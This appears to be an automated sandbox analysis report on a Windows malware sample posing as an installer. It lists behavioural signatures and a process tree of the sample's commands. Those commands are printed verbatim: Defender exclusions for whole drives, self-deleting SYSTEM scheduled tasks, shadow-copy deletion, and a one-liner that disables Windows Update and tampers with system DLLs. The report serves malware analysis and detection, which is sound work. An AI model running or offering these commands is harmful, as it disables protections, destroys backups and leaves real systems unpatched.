Analysis

  • max time kernel
    133s
  • max time network
    154s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260709-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260709-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    30/08/2026, 22:22

General

  • Target
    setup_a9.0.09.exe
  • Size 31.2MB
  • Sample260830-2agg5sap8x
  • SHA256 c8a13572ae1bab74df753d555aeb6cd230eae57e2c758827ac1742fe291ea667
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 18 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Possible privilege escalation attempt 23 IoCs
  • Disables service(s) 3 TTPs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 5 IoCs
  • Modifies file permissions 1 TTPs 23 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Indicator Removal: Clear Persistence 1 TTPs 10 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Screensaver 1 TTPs 3 IoCs

    Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.

  • Executes a command shell one-liner 1 TTPs 28 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Control Panel 4 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 27 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_a9.0.09.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_a9.0.09.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:2180
  • C:\Users\Public\cbW98K\vqI7Q3.exe
    "C:\Users\Public\cbW98K\vqI7Q3.exe"
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2496
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)','C:\' -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of AdjustPrivilegeToken
      PID:3776
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\cbW98K\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:2196
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\cbW98K\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:5516
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:1704
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:968
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:1364
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:1624
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:2844
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:4468
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:1368
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:2452
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:2860
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:3076
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:2568
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:1688
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:2660
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:6132
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:5752
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:2344
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:1012
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:1244
                        • C:\Program Files (x86)\ZZwLqr\FOCJfj.exe
                          "C:\Program Files (x86)\ZZwLqr\FOCJfj.exe"
                          2⤵
                          • UAC bypass
                          • Drops file in Drivers directory
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Adds Run key to start application
                          • Drops file in Program Files directory
                          • Event Triggered Execution: Screensaver
                          • Modifies Control Panel
                          • Suspicious use of WriteProcessMemory
                          • System policy modification
                          PID:4288
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c vssadmin delete shadows /all /quiet
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:2884
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\ZZwLqr" /inheritance:r
                            3⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:2396
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\ZZwLqr" /inheritance:r
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:3136
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:5848
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd /c echo.>c:\xxxx.ini
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            PID:3012
                          • C:\Windows\SysWOW64\cmd.exe
                            cmd.exe /c icacls "C:\Program Files (x86)\ZZwLqr" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                            3⤵
                            • Executes a command shell one-liner
                            • Suspicious use of WriteProcessMemory
                            PID:4940
                            • C:\Windows\SysWOW64\icacls.exe
                              icacls "C:\Program Files (x86)\ZZwLqr" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              4⤵
                              • Possible privilege escalation attempt
                              • Modifies file permissions
                              • System Location Discovery: System Language Discovery
                              PID:4224
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\ZZwLqr\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                            3⤵
                            • Indicator Removal: Clear Persistence
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:4172
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\ZZwLqr\" /t REG_DWORD /d 0 /f"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Scheduled Task/Job: Scheduled Task
                              PID:1868
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Run /TN "Task1"
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:2528
                            • C:\Windows\SysWOW64\schtasks.exe
                              SCHTASKS /Delete /TN "Task1" /F
                              4⤵
                              • System Location Discovery: System Language Discovery
                              PID:2360
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" cmd.exe /q /c "@echo off & (for %i in (wuauserv UsoSvc uhssvc WaaSMedicSvc) do ( net stop %i >nul 2>&1 & sc config %i start= disabled >nul 2>&1 & sc failure %i reset= 0 actions= "" >nul 2>&1 )) & (for %i in (WaaSMedicSvc wuaueng) do ( takeown /f C:\Windows\System32\%i.dll >nul 2>&1 & icacls C:\Windows\System32\%i.dll /grant *S-1-1-0:F >nul 2>&1 & rename C:\Windows\System32\%i.dll %i_BAK.dll >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /setowner "NT SERVICE\TrustedInstaller" >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /remove *S-1-1-0 >nul 2>&1 )) & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f >nul 2>&1 & reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 & erase /f /s /q c:\windows\softwaredistribution\*.* >nul 2>&1 & rmdir /s /q c:\windows\softwaredistribution >nul 2>&1 & powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}" >nul 2>&1"
                            3⤵
                            • Executes a command shell one-liner
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of WriteProcessMemory
                            PID:3952
                            • C:\Windows\SysWOW64\net.exe
                              net stop wuauserv
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:1004
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop wuauserv
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:1892
                            • C:\Windows\SysWOW64\sc.exe
                              sc config wuauserv start= disabled
                              4⤵
                              • Launches sc.exe
                              PID:4812
                            • C:\Windows\SysWOW64\sc.exe
                              sc failure wuauserv reset= 0 actions= ""
                              4⤵
                              • Launches sc.exe
                              PID:820
                            • C:\Windows\SysWOW64\net.exe
                              net stop UsoSvc
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:4804
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop UsoSvc
                                5⤵
                                • System Location Discovery: System Language Discovery
                                PID:2704
                            • C:\Windows\SysWOW64\sc.exe
                              sc config UsoSvc start= disabled
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:4544
                            • C:\Windows\SysWOW64\sc.exe
                              sc failure UsoSvc reset= 0 actions= ""
                              4⤵
                              • Launches sc.exe
                              • System Location Discovery: System Language Discovery
                              PID:4508
                            • C:\Windows\SysWOW64\net.exe
                              net stop uhssvc
                              4⤵
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of WriteProcessMemory
                              PID:2888
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop uhssvc
                                5⤵
                                  PID:5740
                              • C:\Windows\SysWOW64\sc.exe
                                sc config uhssvc start= disabled
                                4⤵
                                • Launches sc.exe
                                PID:5260
                              • C:\Windows\SysWOW64\sc.exe
                                sc failure uhssvc reset= 0 actions= ""
                                4⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:2680
                              • C:\Windows\SysWOW64\net.exe
                                net stop WaaSMedicSvc
                                4⤵
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of WriteProcessMemory
                                PID:3692
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop WaaSMedicSvc
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2664
                              • C:\Windows\SysWOW64\sc.exe
                                sc config WaaSMedicSvc start= disabled
                                4⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:3852
                              • C:\Windows\SysWOW64\sc.exe
                                sc failure WaaSMedicSvc reset= 0 actions= ""
                                4⤵
                                • Launches sc.exe
                                • System Location Discovery: System Language Discovery
                                PID:6068
                              • C:\Windows\SysWOW64\takeown.exe
                                takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4628
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:4264
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5116
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /remove *S-1-1-0
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • System Location Discovery: System Language Discovery
                                PID:564
                              • C:\Windows\SysWOW64\takeown.exe
                                takeown /f C:\Windows\System32\wuaueng.dll
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1548
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls C:\Windows\System32\wuaueng.dll /grant *S-1-1-0:F
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • System Location Discovery: System Language Discovery
                                PID:4396
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls C:\Windows\System32\wuaueng_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • System Location Discovery: System Language Discovery
                                • Suspicious use of AdjustPrivilegeToken
                                PID:5504
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls C:\Windows\System32\wuaueng_BAK.dll /remove *S-1-1-0
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                • System Location Discovery: System Language Discovery
                                PID:5716
                              • C:\Windows\SysWOW64\reg.exe
                                reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
                                4⤵
                                  PID:3352
                                • C:\Windows\SysWOW64\reg.exe
                                  reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
                                  4⤵
                                    PID:2484
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1464
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}"
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5432
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\ZZwLqr" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                  3⤵
                                  • Executes a command shell one-liner
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of WriteProcessMemory
                                  PID:3372
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\ZZwLqr" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:1048
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\ZZwLqr\FOCJfj.exe" /inheritance:r
                                  3⤵
                                  • Executes a command shell one-liner
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of WriteProcessMemory
                                  PID:3444
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\ZZwLqr\FOCJfj.exe" /inheritance:r
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:5744
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c icacls "C:\Program Files (x86)\ZZwLqr\FOCJfj.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                  3⤵
                                  • Executes a command shell one-liner
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of WriteProcessMemory
                                  PID:1184
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\ZZwLqr\FOCJfj.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                    4⤵
                                    • Possible privilege escalation attempt
                                    • Modifies file permissions
                                    • System Location Discovery: System Language Discovery
                                    PID:4816
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                  3⤵
                                  • Indicator Removal: Clear Persistence
                                  • Suspicious use of WriteProcessMemory
                                  PID:2476
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:3784
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Run /TN "Task1"
                                    4⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:5592
                                  • C:\Windows\SysWOW64\schtasks.exe
                                    SCHTASKS /Delete /TN "Task1" /F
                                    4⤵
                                      PID:2276
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\ZZwLqr\FOCJfj.exe" /grant:r Users:(RX) /deny Users:(DE)
                                    3⤵
                                    • Executes a command shell one-liner
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of WriteProcessMemory
                                    PID:2764
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\ZZwLqr\FOCJfj.exe" /grant:r Users:(RX) /deny Users:(DE)
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      PID:1968
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\ZZwLqr\image.png" /inheritance:r
                                    3⤵
                                    • Executes a command shell one-liner
                                    • System Location Discovery: System Language Discovery
                                    PID:4284
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\ZZwLqr\image.png" /inheritance:r
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      • System Location Discovery: System Language Discovery
                                      PID:2600
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c icacls "C:\Program Files (x86)\ZZwLqr\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                    3⤵
                                    • Executes a command shell one-liner
                                    • System Location Discovery: System Language Discovery
                                    PID:3908
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\ZZwLqr\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                      4⤵
                                      • Possible privilege escalation attempt
                                      • Modifies file permissions
                                      PID:4344
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                    3⤵
                                    • Indicator Removal: Clear Persistence
                                    • System Location Discovery: System Language Discovery
                                    PID:3000
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:4948
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Run /TN "Task1"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:4996
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Delete /TN "Task1" /F
                                      4⤵
                                        PID:2356
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\ZZwLqr\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                      3⤵
                                      • Executes a command shell one-liner
                                      • System Location Discovery: System Language Discovery
                                      PID:1360
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\ZZwLqr\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:2724
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\ZZwLqr\thumbs.db" /inheritance:r
                                      3⤵
                                      • Executes a command shell one-liner
                                      PID:2188
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\ZZwLqr\thumbs.db" /inheritance:r
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:5128
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c icacls "C:\Program Files (x86)\ZZwLqr\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                      3⤵
                                      • Executes a command shell one-liner
                                      • System Location Discovery: System Language Discovery
                                      PID:1812
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files (x86)\ZZwLqr\thumbs.db" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                        4⤵
                                        • Possible privilege escalation attempt
                                        • Modifies file permissions
                                        • System Location Discovery: System Language Discovery
                                        PID:1700
